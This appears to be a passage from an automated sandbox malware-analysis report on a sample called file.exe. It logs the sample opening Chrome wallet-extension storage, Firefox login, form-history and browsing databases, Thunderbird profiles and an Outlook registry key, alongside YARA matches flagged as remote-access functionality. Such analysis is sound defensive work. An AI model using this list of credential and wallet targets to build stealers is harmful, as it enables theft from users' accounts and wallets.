Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fAeDYcmqiE_joVxmGjCsOKI.zip, type: DROPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\signons.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\logins.json
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4548516421.0000000005D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 1432, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fAeDYcmqiE_joVxmGjCsOKI.zip, type: DROPPED